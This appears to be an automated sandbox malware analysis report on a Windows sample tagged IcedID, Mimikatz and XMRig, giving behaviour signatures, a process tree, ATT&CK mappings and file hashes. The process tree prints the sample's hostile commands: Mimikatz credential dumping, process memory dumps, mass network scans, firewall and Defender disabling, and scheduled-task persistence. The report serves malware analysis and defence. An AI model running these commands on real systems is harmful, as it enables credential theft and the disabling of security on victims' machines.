Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
10-07-2024 08:24
General
-
Target
2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe
-
Size
8.4MB
-
MD5
49489f50da3d372fe26ee4db5d24299c
-
SHA1
92ee2308c88587d5ca115d9d9d9cbf7ce1425333
-
SHA256
aa393485f34b46603d92085a6c52a2acd685c69e5fef83f0b0a5cd318f014e26
-
SHA512
dfa0a01bf322ac169b265efb8669912a7231adce6aed5640ab095a7441b4c1c007c8c803903fa28b1d7d736f11b5aa5234a30362eb6abccb06ef0169e13deff2
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (29407) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 26 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 39 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\rcniikecz\qfkbee.exe"C:\Windows\TEMP\rcniikecz\qfkbee.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\qwfeikpz\wufpycp.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\qwfeikpz\wufpycp.exeC:\Windows\qwfeikpz\wufpycp.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\qwfeikpz\wufpycp.exeC:\Windows\qwfeikpz\wufpycp.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\grcbdiffb\bbccvkzri\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\grcbdiffb\bbccvkzri\wpcap.exeC:\Windows\grcbdiffb\bbccvkzri\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\grcbdiffb\bbccvkzri\fwecknipu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\grcbdiffb\bbccvkzri\Scant.txt2⤵
-
C:\Windows\grcbdiffb\bbccvkzri\fwecknipu.exeC:\Windows\grcbdiffb\bbccvkzri\fwecknipu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\grcbdiffb\bbccvkzri\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\grcbdiffb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\grcbdiffb\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\grcbdiffb\Corporate\vfshost.exeC:\Windows\grcbdiffb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "czeybgele" /ru system /tr "cmd /c C:\Windows\ime\wufpycp.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "czeybgele" /ru system /tr "cmd /c C:\Windows\ime\wufpycp.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gwfpzaezv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gwfpzaezv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zbaheirbu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zbaheirbu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 776 C:\Windows\TEMP\grcbdiffb\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 332 C:\Windows\TEMP\grcbdiffb\332.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 1688 C:\Windows\TEMP\grcbdiffb\1688.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 2612 C:\Windows\TEMP\grcbdiffb\2612.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3008 C:\Windows\TEMP\grcbdiffb\3008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3044 C:\Windows\TEMP\grcbdiffb\3044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 772 C:\Windows\TEMP\grcbdiffb\772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3784 C:\Windows\TEMP\grcbdiffb\3784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3872 C:\Windows\TEMP\grcbdiffb\3872.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3940 C:\Windows\TEMP\grcbdiffb\3940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 4024 C:\Windows\TEMP\grcbdiffb\4024.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3368 C:\Windows\TEMP\grcbdiffb\3368.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 3936 C:\Windows\TEMP\grcbdiffb\3936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 2308 C:\Windows\TEMP\grcbdiffb\2308.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\grcbdiffb\cbfrbbacp.exeC:\Windows\TEMP\grcbdiffb\cbfrbbacp.exe -accepteula -mp 2672 C:\Windows\TEMP\grcbdiffb\2672.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\grcbdiffb\bbccvkzri\scan.bat2⤵
-
C:\Windows\grcbdiffb\bbccvkzri\qiezzkiir.exeqiezzkiir.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\ogiqci.exeC:\Windows\SysWOW64\ogiqci.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wufpycp.exe1⤵
-
C:\Windows\ime\wufpycp.exeC:\Windows\ime\wufpycp.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qwfeikpz\wufpycp.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rcniikecz\qfkbee.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\wufpycp.exe1⤵
-
C:\Windows\ime\wufpycp.exeC:\Windows\ime\wufpycp.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.2MB
MD57f12b6468efff935b824c737b465a943
SHA151fc3a3762f089bd5d044da15c800ace7258f5e5
SHA256f37d6e864e75975fcf3e87c4362ddeca628fada5b22e6c2f999b64158072f449
SHA51292b34113ebfea77c17b6601500f9c3c3b48e5454c260fee857b332e9b5bcc3838667ec5c7e65ff7506e81152c4a6ca38163f8933bd2430386a10f0ab60f38bb0
-
Filesize
8.6MB
MD5ccabd31b1e2a04e8247692843d4038e7
SHA191b69ea4c091ae5c53a3858e5c644230158fdc9f
SHA256a985dc7cf66bb36df2e6360ec3228b1ff3980d0ffd0db53355cc437ed8e605f0
SHA5126301863f748edecfc12b72fd54594f0cd4635ead09e49fd1539e3ade23ffe4d408d1e0774021271035a608943c992c80e6ebde6676ae913ae5b46ab02a693b0b
-
Filesize
7.6MB
MD5a8a0e89264e55464fb8bf659066076a9
SHA10063b035cea799896bde495919f104d39299005b
SHA256f2e5857f5c1f5699cb2952c3953d0e4c2ba8beca39d449cedf4a5e4ffa6824c2
SHA51289fa4961a0211eb36e956b74b5e951e938ed11184b732e57c4beade8343c645f56e18d620c69ba35f90bfbe35e3fa17633602a0a17be3a957c81b5b4a6566d8d
-
Filesize
822KB
MD55b765e53767c5df4e350e15411c24b9f
SHA1ebe004fa28966df6347a88608327fc5113aff358
SHA2568d461b82c703610006e26beaed91ec57dfedf8b69ffb53b6a32d31fd4a0cf397
SHA512667083f973b4d882eb637a494dff7ab6d01db25a99cf23b39cecb8b953491fc22ddc2e5f0df8f77ab6e6bf292dd3a68ea682607bc5d7d0db3e727968693396c3
-
Filesize
3.7MB
MD5610a74b0f7a73f87a8ffb1e26afcf444
SHA17f2fdd1a885ee5b39d4b60a1560faeb29532b76b
SHA256168e20ed86c6336aea7fdf7b266a2d3a13c9d0c45b8c7f64ab5ba27dbd823037
SHA512bdfde564304dc7b10b68159579c445d099f7f3f73ebfc37eefbdb1a077f5e76c358a0ca356c7f18fccec59343c9c10c3dde4c33c1efc6fea46ecaf0696023c65
-
Filesize
33.7MB
MD562cd7ebc375cc4ad15308abbf5cdffdd
SHA1892334bed97e2c2d418f7183dcf3101d39ca0cbd
SHA256692bdca08a5b59050bc550b7cdd3a166c3e48e047be0815d3eef7191740d237e
SHA512977eee14088f9fbf30f15602c45e11622d2c9bb7bb0f749a2604ba6fbd8287424c659b99679b8aacbc87875b57e1652d63e7414600243079f7694f63432b1278
-
Filesize
25.9MB
MD57608f54eef31eaaf7aead26810b85537
SHA1d79e87e2d7edf323ec7ff06178aecf9da66959a8
SHA25636cb7da842accd16d54a4016ab96463814e5a62a1291f0c23626945d7eecf530
SHA512e69052f0e20d0c3efb9732c02903e1777ac8937e09e7cfa7c44c90bd54a9590171a123c2fd15e67c950b7df9d1f818c7cf3c63cf6521688b77e7ee57d9bc7a59
-
Filesize
2.5MB
MD550e7c1d7d18bc95f23be176b4db93d8d
SHA186e12847a0111eae66e035296074e15cc522dba7
SHA256008e556ba3495722df3e3759006f87330b7b45e1c78336c184536baf7d33785b
SHA5121dc284f72d4e55acc8faf3411c9fa12e5280774137dd9c11f69b581786b627f60f8b7a14d435b6ff0f3ca477ea0c75ab5a53bea72f99618d29096cee0d7f4982
-
Filesize
20.4MB
MD58000f238b5431816184e581646f4aeab
SHA1da662f2d267d07b8f7096ea2a981e2bd406c7176
SHA256378d5fbbbec06e95e8f871f7774a350c2496af1c216864a62df949daa3a8929b
SHA512ba5f1752bed4f7d9c5b414d77ef436b7a77ef79da1190f99acbc8494cc08bb7e70a51e336e724250e4add7fa31bb6cc608d920c0fdcaa17f6df635f52ce6f930
-
Filesize
1.2MB
MD5855ed1292da240083799a1c2dbe02fca
SHA1468c83abeecb891c2c45e3e296615c8b99d3f8bc
SHA25683f9eb7bfd4dbb2c061d06802dfdbe361ca4bb8670a1c9e58d65b04bc7d12ade
SHA51276e8b658d585798117c55aec4f60d3689e69b3c42876227b3ea4073cd7cb0f3a8a7d883ae70370630c8b22f35188bd8c10339c5ebfcefc84ff1c871cdc2136c9
-
Filesize
3.9MB
MD500dd74ba26df94a60d82fc88c1b4b225
SHA18d5a35ad3de64288ef4f6627f62c792de431801c
SHA2568bdf1375d874063e6e49df0441d8eadda3512868eef96a1bbd95c2ce6db33e6a
SHA5128dd65bb855b8669a0f4dea2b93d6f750a0c76a42ccd7ba059131b5f7eacae068a13d86afda015c54ac11199699b4833ad7ae915125f9795886f8c5c2d441c82b
-
Filesize
44.0MB
MD50605add5c631ea520b6b90dde2c91df9
SHA1ab7a35b6d492b91b824c8d323e176b8ba18edec9
SHA256db4a082cb81e9420c101b915e09fe388c7d1cfe0d19e788a0484c48d7416fae0
SHA512df5499497c6ea664b0615d6a252886241fe29f381821fc50aec4f043b0018f72177248f06c7fa3e0289c87bc3acd17196688d473a60436bc378b8eb33f647001
-
Filesize
3.0MB
MD5aa0c875f7281fdfe7fad745c7bff4e90
SHA105e11f26440d57d88255d8d9f1afea4f4d5a86e2
SHA256005b12aa9ee223aa9b137cf56ed8dfd5dad618744637fe12f09ec6b31e53f40a
